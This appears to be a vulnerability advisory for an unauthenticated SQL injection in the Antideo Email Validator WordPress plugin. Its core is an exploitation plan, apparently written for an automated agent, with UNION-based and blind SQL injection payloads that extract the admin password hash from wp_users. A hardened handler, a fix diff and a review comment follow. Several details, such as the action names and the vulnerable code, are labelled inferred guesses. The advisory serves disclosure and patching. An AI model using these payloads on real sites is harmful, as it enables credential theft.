Antideo Email Validator <= 1.0.10 - Unauthenticated SQL Injection
Description
The Antideo Email Validator plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.0.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Technical Details
This research plan outlines the systematic exploitation of CVE-2025-68017, an unauthenticated SQL Injection vulnerability in the Antideo Email Validator plugin (<= 1.0.10).
1. Vulnerability Summary
The Antideo Email Validator plugin fails to properly sanitize or prepare user-supplied parameters before incorporating them into SQL queries. Specifically, in versions up to 1.0.10, an unauthenticated AJAX handler uses direct string concatenation or insufficient escaping when querying the plugin's internal log or validation tables. This allows an attacker to manipulate the SQL statement, enabling data extraction from the WordPress database (e.g., wp_users table).
2. Attack Vector Analysis
- Endpoint: wp-admin/admin-ajax.php
- Action (Inferred): antideo_email_validator_check or antideo_email_validator_lookup (the plugin typically registers a wp_ajax_nopriv_ hook to allow frontend users to check emails).
- Vulnerable Parameter: Likely the email or log_id parameter.
- Authentication: Unauthenticated (no account required).
- Preconditions: The plugin must be active. A valid AJAX nonce may be required depending on the specific implementation of the public-facing validator.
3. Code Flow (Inferred)
- Request: An unauthenticated user sends a POST request to admin-ajax.php with an action associated with the Antideo validator.
- Hook: The wp_ajax_nopriv_[action] hook triggers the handler function (likely located in includes/class-antideo-email-validator-public.php or the main plugin file).
- Extraction: The handler retrieves user input via $_POST['email'] or $_GET['email'].
- Vulnerable Sink: The input is passed directly into a query like:
  $wpdb->get_results("SELECT * FROM {$wpdb->prefix}antideo_email_logs WHERE email = '" . $_POST['email'] . "'");
- Execution: The database executes the injected SQL, and if the output is reflected in the AJAX response, data is exfiltrated.
4. Nonce Acquisition Strategy
The plugin likely uses wp_localize_script to pass a nonce to the frontend for the AJAX request.
- Identify Shortcode: Locate the shortcode used to display the email validator (e.g., [antideo-email-validator]).
- Create Test Page: wp post create --post_type=page --post_title="Validator" --post_status=publish --post_content='[antideo-email-validator]'
- Extract Nonce:
  - Navigate to the newly created page using browser_navigate.
  - Identify the localized JavaScript object. Search the source for wp_localize_script output. Common identifiers in this plugin: antideo_email_validator_obj or antideo_v.
  - Use browser_eval to extract the nonce:
    // Example (adjust based on actual JS object found in source)
    window.antideo_email_validator_obj?.nonce
5. Exploitation Strategy
We will use a UNION-based SQL injection to extract the administrator's username and password hash.
- Step 1: Determine Column Count. Send requests incrementing the ORDER BY count until an error occurs.
  - Payload: email=test@example.com' ORDER BY 1-- -
- Step 2: Identify Reflected Columns. Use a UNION SELECT with identifiable strings.
  - Payload: email=invalid' UNION SELECT 1,2,'REFLECTED_3',4,5,6-- -
- Step 3: Extract Admin Data. Once the column count and reflected position are known (e.g., position 3), extract user data.
  - Request Type: POST via http_request.
  - URL: http://localhost:8080/wp-admin/admin-ajax.php
  - Content-Type: application/x-www-form-urlencoded
  - Body: action=[ACTION_NAME]&security=[NONCE]&email=x' UNION SELECT 1,2,CONCAT(user_login,0x3a,user_pass),4,5... FROM wp_users WHERE ID=1-- -
6. Test Data Setup
- Activate Plugin: wp plugin activate antideo-email-validator
- Create Target Data: Ensure an admin user exists (default is usually ID 1).
- Generate Logs (Optional): Perform one legitimate email check through the UI to ensure the log table is populated, which sometimes helps in stabilizing UNION queries.
- Shortcode Page: As described in Section 4.
7. Expected Results
- Success Indicator: The AJAX response contains the concatenated string admin:$P$B... (the hash).
- Response Format: Likely a JSON object where one of the fields contains the injected data.
- Error Case: If UNION is blocked or the column count is wrong, the response may be empty or contain a database error (if WP_DEBUG is on).
8. Verification Steps
After the exploit attempt, verify the extracted data matches the database:
# Verify the hash for the admin user
wp db query "SELECT user_login, user_pass FROM wp_users WHERE ID = 1"
Compare the output of this command with the string retrieved via the SQL injection.
9. Alternative Approaches
If UNION-based injection is not possible (e.g., no reflected output):
- Time-Based Blind: Use SLEEP(5) to confirm the injection. Payload: email=x' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -
- Boolean-Based Blind: Check for differences in the response when querying ... AND 1=1 vs ... AND 1=2.
- Action Discovery: If the inferred action name is wrong, use grep -r "wp_ajax_nopriv" wp-content/plugins/antideo-email-validator/ to find the correct registration.
Summary
The Antideo Email Validator plugin for WordPress is vulnerable to unauthenticated SQL Injection because it concatenates user-supplied parameters directly into SQL queries without using prepared statements. Attackers can exploit this to extract sensitive information from the WordPress database, including administrative credentials.
Vulnerable Code
// Likely in a file such as includes/class-antideo-email-validator-public.php or the main plugin file
// The handler retrieves user input and concatenates it into a query sink.
$email = $_POST['email'];
$results = $wpdb->get_results("SELECT * FROM {$wpdb->prefix}antideo_email_logs WHERE email = '" . $email . "'");
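For contrast, the same lookup written as a hardened AJAX handler. This is an added example, not the plugin's code: the action name antideo_email_validator_check, the hook registration and the nonce action string antideo_nonce are assumptions; the table name and the security request field are the ones quoted on this page.

```php
<?php
// Added example (not the plugin's own code). Hook/action names and the nonce
// action string 'antideo_nonce' are assumptions; 'security' is the request
// field name shown in the exploit body above.
add_action( 'wp_ajax_nopriv_antideo_email_validator_check', 'example_hardened_lookup' );
add_action( 'wp_ajax_antideo_email_validator_check', 'example_hardened_lookup' );

function example_hardened_lookup() {
    global $wpdb;

    // 1. Reject requests that do not carry the nonce handed to the frontend
    //    script. check_ajax_referer() dies with a 403 on failure, so an
    //    anonymous caller without a page view cannot reach the query at all.
    check_ajax_referer( 'antideo_nonce', 'security' );

    // 2. Validate the parameter before it goes anywhere near SQL. WordPress
    //    adds slashes to $_POST, hence wp_unslash(). is_email() rejects quotes,
    //    spaces and SQL keywords, so a value such as  x' UNION SELECT ...  is
    //    refused here regardless of what the query layer does.
    $raw   = isset( $_POST['email'] ) ? wp_unslash( $_POST['email'] ) : '';
    $email = sanitize_email( $raw );
    if ( '' === $email || ! is_email( $email ) ) {
        wp_send_json_error( array( 'message' => 'invalid email' ), 400 );
    }

    // 3. Prepared statement: %s is bound as an escaped, quoted string, so the
    //    value can only ever be compared, never change the query structure.
    //    The table name comes from $wpdb->prefix, not from user input, so
    //    interpolating it into the template is safe.
    $table = $wpdb->prefix . 'antideo_email_logs';
    $count = (int) $wpdb->get_var(
        $wpdb->prepare( "SELECT COUNT(*) FROM {$table} WHERE email = %s", $email )
    );

    // 4. Return only what the frontend needs. Echoing SELECT * rows back in
    //    the JSON response is what turned the original injection into a
    //    direct data-exfiltration channel.
    wp_send_json_success( array( 'email' => $email, 'seen' => $count ) );
}
```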
Security Fix
@@ -1,1 +1,1 @@ -$results = $wpdb->get_results("SELECT * FROM {$wpdb->prefix}antideo_email_logs WHERE email = '" . $_POST['email'] . "'"); +$results = $wpdb->get_results($wpdb->prepare("SELECT * FROM {$wpdb->prefix}antideo_email_logs WHERE email = %s", $_POST['email']));
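Review bot: The prepare() call with a %s placeholder on the + line is the right fix for the concatenated sink, but $_POST['email'] is still read without an isset() check and without wp_unslash(), so a request that omits the parameter raises a PHP warning and a value containing quotes reaches prepare() with WordPress's added slashes; suggest binding a pre-validated variable instead, e.g. `$email = isset( $_POST['email'] ) ? sanitize_email( wp_unslash( $_POST['email'] ) ) : '';` followed by `$wpdb->prepare( "... WHERE email = %s", $email )`. The hunk also shows no nonce or capability check around the sink, so the nopriv handler stays reachable anonymously once the injection is closed; a check_ajax_referer() call before the query belongs in this change, or a note on why it is not needed.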
Exploit Outline
The exploit targets the AJAX endpoint used for frontend email validation.
1. Locate a page containing the plugin's email validator shortcode to extract a valid AJAX nonce from the localized JavaScript objects (e.g., antideo_email_validator_obj).
2. Send a POST request to /wp-admin/admin-ajax.php with the 'action' set to the plugin's validation handler.
3. Provide the 'email' parameter containing a SQL Injection payload, such as a UNION SELECT statement (e.g., "' UNION SELECT 1,2,user_pass,4,5 FROM wp_users WHERE ID=1-- -").
4. The plugin executes the concatenated query and returns the results in the JSON response, allowing the attacker to view the extracted database content, such as password hashes.